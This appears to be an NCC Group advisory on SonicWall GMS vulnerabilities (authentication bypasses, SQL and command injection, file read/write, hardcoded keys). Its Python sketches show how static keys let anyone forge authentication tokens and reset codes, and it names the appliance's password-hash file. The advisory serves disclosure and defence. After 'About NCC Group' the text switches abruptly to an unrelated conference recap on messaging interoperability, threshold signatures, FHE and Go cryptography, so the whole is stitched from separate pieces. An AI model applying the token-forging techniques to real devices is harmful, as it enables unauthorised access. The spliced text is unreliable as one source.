Title: Multiple Unauthenticated SQL Injection Issues & Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help protect against SQL injection attacks could be bypassed.
Impact
An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.
Web Service Authentication Bypass – CVE-2023-34124
Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.
The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.
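As an illustration of this class of flaw (the field names and values below are hypothetical, not the application's actual parameters), the following sketch computes a standard RFC 2617 digest response with a known public value standing in where a secret password belongs. Because every input to the calculation is observable, anyone can produce a valid response:

```python
import hashlib

def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def digest_response(user: str, realm: str, public_value: str,
                    nonce: str, method: str, uri: str) -> str:
    # Standard RFC 2617 digest calculation; 'public_value' stands in for
    # the non-secret value accepted in place of a real password.
    ha1 = _md5(f"{user}:{realm}:{public_value}")
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")

# An observer of the realm and nonce can compute a valid response,
# because nothing in the calculation is secret.
token = digest_response("admin", "ws", "known-public-value",
                        "server-nonce", "POST", "/ws/method")
```

Digest authentication is only as strong as the secrecy of the password input; substituting a discoverable value reduces it to an obfuscation step.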
Impact
An attacker with knowledge of the authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.
Predictable Password Reset Key – CVE-2023-34123
Title: Predictable Password Reset Key
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.
An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.
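A generic sketch of the anti-pattern follows. HMAC-SHA256 stands in for the 3DES construction described above, and the key, serial number and username are all illustrative: the point is that when the key ships in every install and the remaining inputs are discoverable without authentication, an attacker can reproduce the exact code the appliance would accept.

```python
import hashlib
import hmac

# Hypothetical key; the real flaw is that it is identical in every install.
BAKED_IN_KEY = b"same-key-in-every-install"

def reset_code(serial_number: str, username: str) -> str:
    # Both inputs are obtainable unauthenticated, so the code is predictable.
    material = f"{serial_number}:{username}".encode()
    return hmac.new(BAKED_IN_KEY, material, hashlib.sha256).hexdigest()[:16]

# The attacker's computation matches the appliance's exactly.
code = reset_code("SN-0123456789", "admin")
```

Reset codes only provide security if they incorporate per-install secrets or server-side randomness that an attacker cannot reproduce.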
Impact
An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.
CAS Authentication Bypass – CVE-2023-34137
Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.
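The flawed scheme can be sketched as follows (the key value is a placeholder): because the HMAC key is a constant in the shipped code, "authentication" reduces to knowing a username, and the server's recomputation accepts any token an attacker derives the same way.

```python
import hashlib
import hmac

# Placeholder for the static value shipped in every build.
STATIC_HMAC_KEY = b"shipped-in-every-build"

def cas_token(username: str) -> str:
    # HMAC-SHA1 of the username, as described above; with a static key,
    # anyone with the source can compute this for any user.
    return hmac.new(STATIC_HMAC_KEY, username.encode(), hashlib.sha1).hexdigest()

def server_accepts(username: str, token: str) -> bool:
    # Server-side check: recompute and compare.
    return hmac.compare_digest(cas_token(username), token)
```

An HMAC only authenticates if its key is secret; here the construction is sound but the key management defeats it.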
Impact
An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.
Post-Authenticated Command Injection – CVE-2023-34127
Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.
Impact
An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Password Hash Read via Web Service – CVE-2023-34134
Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
An authenticated attacker can read the administrator password hash via a web service call.
Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.
Impact
This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attacks to achieve Remote Code Execution.
Post-Authenticated Arbitrary File Read via Backup File Directory Traversal – CVE-2023-34125
Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.
Impact
An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user-passwords hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Post-Authenticated Arbitrary File Upload – CVE-2023-34126
Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated attacker to upload files anywhere on the system with root privileges.
Impact
An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.
Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129
Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34129
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.
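As an illustration (independent of the affected code), a minimal defensive check in Python rejects archive entries that would escape the destination directory before anything is written to disk:

```python
import os
import tempfile
import zipfile

def safe_extract(zip_path: str, dest: str) -> None:
    """Extract a ZIP archive, rejecting entries that escape 'dest'."""
    dest = os.path.realpath(dest)
    with zipfile.ZipFile(zip_path) as zf:
        for name in zf.namelist():
            target = os.path.realpath(os.path.join(dest, name))
            if target != dest and not target.startswith(dest + os.sep):
                raise ValueError(f"blocked path traversal entry: {name}")
        zf.extractall(dest)

# Demo: an archive containing a '../' entry is rejected up front.
with tempfile.TemporaryDirectory() as tmp:
    evil = os.path.join(tmp, "evil.zip")
    with zipfile.ZipFile(evil, "w") as zf:
        zf.writestr("../escape.txt", "owned")
    out = os.path.join(tmp, "out")
    os.mkdir(out)
    try:
        safe_extract(evil, out)
        blocked = False
    except ValueError:
        blocked = True
```

Resolving each entry with realpath() before extraction is the standard mitigation for ZipSlip, since entry names in an archive are fully attacker-controlled.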
Impact
An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.
Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135
Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A web service method allows an authenticated user to read arbitrary files from the underlying file system.
Impact
A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing – for example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.
Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132
Title: Client-Side Hashing Function Allows Pass-the-Hash
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The client-side hashing algorithm used during the logon was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.
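A toy illustration of why client-side hashing makes the hash password-equivalent (SHA-1 here is illustrative, not the application's actual scheme): the server only ever compares hashes, so possessing the hash is as good as possessing the password.

```python
import hashlib

def client_login_value(password: str) -> str:
    # Hashing happens on the client; the server never sees the password.
    return hashlib.sha1(password.encode()).hexdigest()

# What the server stores for the user.
STORED = client_login_value("correct horse battery staple")

def server_accepts(submitted: str) -> bool:
    # The server compares the submitted hash directly against storage.
    return submitted == STORED

# An attacker who stole only the hash logs in without the password.
stolen_hash = STORED
```

The usual remedy is to treat the transmitted value as the password and store a separate server-side hash of it (with a salt and a slow KDF), so a leaked database entry is not directly replayable.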
Impact
An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.
Hardcoded Tomcat Credentials (Privilege Escalation) – CVE-2023-34128
Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.
Impact
An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as a local privilege escalation vector in the case where an attacker has gained low-privileged access to the OS (e.g., via the postgres or snwlcli users).
Unauthenticated File Upload – CVE-2023-34136
Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.
Impact
Whilst the location of the upload is not controllable by the attacker, this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.
Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).
Unauthenticated Sensitive Information Leak – CVE-2023-34131
Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
A number of pages were found not to require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could later be used as a prerequisite for further attacks.
Impact
An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.
Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130
Title: Use of Outdated Cryptographic Algorithm with Hardcoded Key
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>
Description
The GMS application was found to make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block cipher which suffers from known weaknesses. Its use is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).
Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.
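For reference, TEA is small enough to sketch in a few lines. The key below is a placeholder, not the value found in the application; the sketch illustrates that once a static key is baked into distributed code, anyone with the source can decrypt the data regardless of cipher choice.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF  # keep arithmetic within 32 bits

def tea_encrypt(block: bytes, key: bytes) -> bytes:
    # Reference TEA: 32 rounds over one 64-bit block with a 128-bit key.
    v0, v1 = struct.unpack(">2I", block)
    k = struct.unpack(">4I", key)
    s = 0
    for _ in range(32):
        s = (s + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
    return struct.pack(">2I", v0, v1)

def tea_decrypt(block: bytes, key: bytes) -> bytes:
    # Inverse of the above: run the rounds backwards.
    v0, v1 = struct.unpack(">2I", block)
    k = struct.unpack(">4I", key)
    s = (DELTA * 32) & MASK
    for _ in range(32):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK
        s = (s - DELTA) & MASK
    return struct.pack(">2I", v0, v1)

# A hardcoded key in the source defeats the cipher: anyone who can read
# the code can decrypt whatever it protects.
HARDCODED_KEY = bytes(range(16))
ct = tea_encrypt(b"8bytes!!", HARDCODED_KEY)
```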
Impact
An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.
Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.
About NCC Group
NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.
A specter is haunting Europe – the specter of platform interoperability. The EU signed the Digital Markets Act (DMA) into law in September of last year, mandating that chat platforms provide support for interoperable communications. This requirement will be in effect by March of 2024, an aggressive timeline requiring fast action from cryptographic (and regular) engineers.
There are advantages to interoperability. It allows users to communicate with their friends and family across platforms, and it allows developers to build applications that work across platforms. There is the potential for this to partially mitigate the network effects associated with platform lock-in, which could lead to more competition and greater freedom of choice for end users.
However, interoperability requires shared standards, and standards tend to imply compromise. This is a particularly severe challenge with secure chat apps which aim to provide their users with high levels of security. Introducing hastily designed, legislatively mandated components into these systems is a high-risk change which, in the worst case, could introduce weaknesses that would be difficult to fix (due to the effects of lock-in and the corresponding level of coordination and engineering effort required). This is further complicated by the heterogeneity of the field in regard to end-to-end encrypted chat: E2EE protocols vary by ciphersuite, level and form of authentication, personal identifier (email, phone number, username/password, etc.), and more. Any standardized design for interoperability would need to be able to manage all this complexity.
This presentation on work by Ghosh, Grubbs, Len, and Rösler discussed one effort at introducing such a standard for interoperability between E2EE chat apps, focused on extending existing components of widely used E2EE apps. This is appropriate as these apps are most likely to be identified as “gatekeeper” apps to which the upcoming regulations apply in force.
The proposed solution uses server-to-server interoperability, in which each end user is only required to directly communicate with their own messaging provider. Three main components of messaging affected by the DMA are identified: identity systems, E2EE protocols, and abuse prevention.
For the first of these items, a system for running encrypted queries to remote providers’ identity systems is proposed; this allows user identities to be associated with keys in such a way that the actual identity data is abstracted and thus could be an email, a phone number, or an arbitrary string.
For the second issue, the E2EE protocol itself, a number of simple solutions are considered and rejected; the final proposal has several parts. Sender-anonymous wrappers are proposed, using a variant of the Sealed Sender protocol from Signal, to hide sender metadata; for encryption in transit, non-gatekeeper apps can use an encapsulated implementation of a gatekeeper app’s E2EE through a client bridge. This provides both confidentiality and authenticity, while minimizing metadata leakage.
For the third issue, abuse prevention, a number of options (including “doing nothing”) are again considered and rejected. The final design is somewhat nonobvious, and consists of server-side spam filtering, user reporting (via asymmetric message franking, one of the more cryptographically fresh and interesting parts of the system), and blocklisting (which requires a small data leakage, in that the initiator would need to share the blocked party’s user ID with their own server).
Several open problems were also identified (these points are quoted directly from the slides):
How do we improve the privacy of interoperable E2EE by reducing metadata leakage?
How do we extend other protocols used in E2EE messaging, like key transparency, into the interoperability setting?
How do we extend our framework and analyses to group chats and encrypted calls?
This is important and timely work on a topic which has the potential to result in big wins for user privacy and user experience; however, this best-case scenario will only play out if players in industry and academia can keep pace with the timeline set by the DMA. This requires quick work to design, implement, and review these protocols, and we look forward to seeing how these systems take shape in the months to come.
– Eli Sohl
Threshold ECDSA Towards Deployment
A Threshold Signature Scheme (TSS) allows any sufficiently large subset of signers to cryptographically sign a message. There has been a flurry of research in this area in the last 10 years, driven partly by financial institutions’ needs to secure crypto wallets and partly by academic interest in the area from the Multiparty Computation (MPC) perspective. Some signature schemes are more amenable to “thresholding” than others. For example, due to linearity features of “classical” Schnorr signatures, Schnorr is more amenable to “thresholding” than ECDSA (see the FROST protocol in this context). As for thresholding ECDSA, there are tradeoffs as well; if one allows using cryptosystems such as Paillier’s, the overall protocol complexity drops, but speed and extraneous security model assumptions appear to suffer. The DKLS papers, listed below, aim for competitive speeds and minimizing necessary security assumptions:
DKLS18: “Secure Two-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
DKLS19: “Secure Multi-party Threshold ECDSA from ECDSA Assumptions”, Jack Doerner, Yashvanth Kondi, Eysa Lee, abhi shelat
The first paper proposes a 2-out-of-n ECDSA scheme, whereas the second paper extends it to the t-out-of-n case. The DKLS 2-party multiplication algorithm is based on Oblivious Transfer (OT) together with a number of optimization techniques. The OT is batched, then further sped up by an OT Extension (a way to reduce a large number of OTs to a smaller number of OTs using symmetric key cryptography) and finally used to multiply in a threshold manner. An optimized variant of this multiplication algorithm is used in DKLS19 as well. The talk aimed to share the challenges that occur in practical development and deployments of the DKLS19 scheme, including:
The final protocol essentially requires three messages; however, the authors found they could pipeline the messages when signing multiple messages.
Key refreshing can be done efficiently, where refreshing means replacing the shares and leaving the actual key unchanged.
Round complexity was reduced to a 5-round protocol, reducing the time cost especially over WAN.
One bug identified by Roy in OT extensions turned out not to apply to the DKLS implementations; however, the authors are still taking precautions and moving to SoftSpoken OT.
An error handling mistake was found in the implementation by Riva where an OT failure error was not propagated to the top.
A number of bug bounties around the improper use of the Fiat-Shamir transform were seen recently. If the protocol needs a programmable Random Oracle, every (sub) protocol instance needs a different Random Oracle, which can be done using unique hash prefixes.
The talk also discussed other gaps between theory and practice, such as establishing sessions – e.g., whether O(n²) QR code scans are required to set up the participant set.
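The linearity that makes Schnorr more amenable to thresholding than ECDSA can be seen in a toy two-party sketch (parameters far too small for real use, and no protection against the nonce-related attacks a real protocol like FROST must handle): because the signature is linear in the key and nonce, partial signatures over additive shares simply add up to a valid signature.

```python
import hashlib
import secrets

# Toy group: p = 2q + 1, g = 4 generates the order-q subgroup mod p.
p, q, g = 2039, 1019, 4

def H(R: int, msg: bytes) -> int:
    # Fiat-Shamir style challenge derived from the nonce commitment and message.
    return int.from_bytes(hashlib.sha256(R.to_bytes(2, "big") + msg).digest(),
                          "big") % q

# Each party holds an additive share of the key: x = x1 + x2 (mod q).
x1, x2 = secrets.randbelow(q), secrets.randbelow(q)
y = pow(g, (x1 + x2) % q, p)          # joint public key

msg = b"threshold schnorr toy"
k1, k2 = secrets.randbelow(q), secrets.randbelow(q)
R = pow(g, (k1 + k2) % q, p)          # joint nonce commitment
e = H(R, msg)

# Each party signs using only its own shares; linearity makes the
# partial signatures combine into a standard Schnorr signature.
s1 = (k1 + e * x1) % q
s2 = (k2 + e * x2) % q
s = (s1 + s2) % q
```

ECDSA lacks this structure because its signature equation involves a modular inversion of the nonce, which is why thresholding it requires heavier machinery such as OT-based multiplication or Paillier encryption.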
– Aleksandar Kircanski
The Path to Real World FHE: Navigating the Ciphertext Space
Shruthi Gorantala from Google presented The Path to Real World FHE: Navigating the Ciphertext Space. There was also an FHE workshop prior to RWC where a number of advances in the field were presented. Fully Homomorphic Encryption (FHE) allows functions to be executed directly on ciphertext, producing an encrypted result that decrypts to the same value the function would have produced on the plaintext. This would result in a major shift in the relationship between data privacy and data processing, as previously an application would need to decrypt the data first; FHE removes the need for the decryption and re-encryption steps. This helps preserve end-to-end privacy and gives users additional guarantees, such as cloud providers not having access to their data. However, performance is a major concern, as performing computations on encrypted data using FHE remains significantly slower than performing them on plaintext. Key challenges for FHE include:
Data size expansion,
Speed, and
Usability.
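The core idea of computing on ciphertexts can be illustrated with a toy Paillier example. Paillier is only additively homomorphic, not fully homomorphic, and the primes below are far too small for real use, but it shows the principle: multiplying two ciphertexts yields an encryption of the sum of the plaintexts, without the data ever being decrypted.

```python
import math
import secrets

# Toy Paillier keypair (illustrative primes, far too small for real use).
p_, q_ = 1_000_003, 1_000_033
n = p_ * q_
n2 = n * n
g = n + 1
lam = math.lcm(p_ - 1, q_ - 1)

def L(u: int) -> int:
    return (u - 1) // n

mu = pow(L(pow(g, lam, n2)), -1, n)   # precomputed decryption constant

def encrypt(m: int) -> int:
    # Random blinding factor r with gcd(r, n) = 1.
    while True:
        r = secrets.randbelow(n - 1) + 1
        if math.gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2

def decrypt(c: int) -> int:
    return (L(pow(c, lam, n2)) * mu) % n

# Homomorphic property: multiplying ciphertexts adds plaintexts.
c = (encrypt(3) * encrypt(4)) % n2
```

Schemes like BGV, CKKS and TFHE extend this idea to arbitrary circuits, which is where the performance and usability challenges above come in.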
The focus of the presentation was a model of an FHE hierarchy of needs, covering both deficiency and growth needs. The FHE deficiency needs are the following:
FHE Instruction Set which focuses on data manipulation and ciphertext maintenance.
FHE Compilers and Transpilers which focuses on parameter selection, optimizers and schedulers.
FHE Application Development which focuses on development speed, debugging and interoperability.
The next phase would be FHE growth needs:
FHE Systems Integration and Privacy Engineering which includes threat modeling.
FHE used as a critical component of privacy-enhancing technologies (PETs).
A key current goal for FHE is to reduce the computational overhead for an entire application, to demonstrate FHE’s usefulness in practical real-world settings.
– Javed Samuel
High-Assurance Go Cryptography in Practice
Filippo Valsorda, the maintainer of the cryptographic code in the Go language since 2018, presented the principles at work behind that maintenance effort. The title above is from the RWC program, but the first presentation slide contained an updated title which might be clearer: “Go cryptography without bugs”. Indeed, the core principle of it is that Filippo has a well-defined notion of what he is trying to achieve, that he expressed in slightly more words as follows: “secure, safe, practical, modern, in this order”. This talk was all about very boring cryptography, with no complex mathematics; at most, some signatures or key exchanges, like we already did in the 1990s. But such operations are what actually gets used by applications most of the time, and it is of a great practical importance that these primitives operate correctly, and that common applications do not misuse them through a difficult API. The talk went over these principles in a bit more details, specifically about:
Memory safety: use of a programming language that at least ensures that buffer overflows and use-after-free conditions cannot happen (e.g., Go itself, or Rust).
Tests: many test vectors, to try to exercise edge cases and other tricky conditions. In particular, negative test vectors are important, i.e., verifying that invalid data is properly detected and rejected (many test vector frameworks are only functional and check that the implementation runs correctly under normal conditions, but this is cryptography and in cryptography there is an attacker who is intent on making the conditions very abnormal).
Fuzzing: more tests designed by the computer trying to find unforeseen edge cases. Fuzzing helps because handcrafted negative test vectors can only check for edge conditions that the developer thought about; the really dangerous ones are the cases that the developer did not think about, and fuzzing can find some of them.
